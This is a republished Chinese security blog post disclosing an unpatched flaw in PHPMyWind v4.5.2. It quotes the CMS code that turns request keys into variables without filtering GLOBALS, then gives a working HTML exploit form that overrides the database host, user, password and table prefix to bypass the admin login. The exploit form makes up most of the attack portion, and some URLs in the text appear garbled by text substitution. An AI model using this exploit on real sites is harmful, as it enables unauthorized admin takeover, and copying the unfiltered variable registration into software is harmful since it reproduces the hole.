代码: define('PHPMYWIND_INC', preg_replace("/[\/\\\\]{1,}/", '/', dirname(__FILE__))); define('PHPMYWIND_ROOT', preg_replace("/[\/\\\\]{1,}/", '/', substr(PHPMYWIND_INC, 0, -8))); define('PHPMYWIND_DATA', PHPMYWIND_ROOT.'/data'); define('PHPMYWIND_UPLOAD', PHPMYWIND_ROOT.'/uploads'); define('PHPMYWIND_BACKUP', PHPMYWIND_DATA.'/backup'); define('IN_PHPMYWIND', TRUE); //发放登入牌 //检查外部传递的值,将// ' ""类型数据进行转义 function _RunMagicQuotes(&$strvar) { if(!get_magic_quotes_gpc()) { if(is_array($strvar)) { foreach($strvar as $_key => $_value) $strvar[$_key] = _RunMagicQuotes($_value); } else { $strvar = trim(addslashes($strvar)); } } return $strvar; } //直接应用变量名称替代 foreach(array('_GET','_POST','_COOKIE') as $_request) { foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v); } //Session保存路径 HdhCmsTest2cto测试数据 $sess_savepath = PHPMYWIND_DATA.'/sessions/'; if(is_writable($sess_savepath) && is_readable($sess_savepath)) { session_save_path($sess_savepath); } //上传文件保存路径 $cfg_image_dir = PHPMYWIND_UPLOAD.'/image'; $cfg_soft_dir = PHPMYWIND_UPLOAD.'/soft'; $cfg_media_dir = PHPMYWIND_UPLOAD.'/media'; //系统版本号 $cfg_version = file_get_contents(PHPMYWIND_DATA."/update/version.txt"); //全局配置文件 require_once(PHPMYWIND_INC.'/config.cache.php'); //全局常用函数 require_once(PHPMYWIND_INC.'/common.func.php'); //引入 数据库 类 require_once( PHP MYWIND_INC.'/conn.inc.php'); .....略 有部分是抄dede的 而dede有检测key中是否包含GLOBALS等关键字。只是没考虑多维 而在本文中给出的代码中并没有任何检测。导致GLOALS被注册 exp: < html > <head><title>PHPMyWind Exp</title></head> <body> <div class="login_warp"> <div class="login_area"> <form name="login" method="post" action=http://HdhCmsTest2cto测试数据 /act/admin/login.php onSubmit="return CheckForm()"> <input type="text" name="username" id="username" class="login_area_input" maxlength="20" /> <input type="password" name="password" id="password" class="login_area_input mar8" maxlength="16" /> <input type="text" name="GLOBALS[db_host]" value="localhost" maxlength="16" /> <input type="text" name="GLOBALS[db_user]" value="root" maxlength="16" /> <input type="text" name="GLOBALS[db_pwd]" value="123456" maxlength="16" /> <input type="text" name="GLOBALS[db_name]" value="db_name" maxlength="16" /> <input type="text" name="GLOBALS[db_tablepre]" value="pwm_admin" maxlength="16" /> <div class="check_str"> <input type="text" name="validate" class="login_area_ckstr" id="validate" maxlength="4" /> <span><img id="ckstr" name="ckstr" src="data/captcha/ckstr.php" title="看不清?点击更换" align="absmiddle" style="cursor:pointer;" onClick="this.src=this.src+'?'" /> <a href="javascript:;" onClick="var v=document.getElementById('ckstr');v.src=v.src+'?';return false;">看不清?</a></span></div> <div class="hr_20"></div> <input type="submit" class="login_area_btn" value="提交" style="cursor:pointer;" /> <input type="hidden" name="dopost" value="login" /> </form> </div> </body> </html> 作者:Samy 出处:http://hi.baidu测试数据/0x7362/blog
查看更多关于PHPMyWind v4.5.2 0day - 网站安全 - 自学php的详细内容...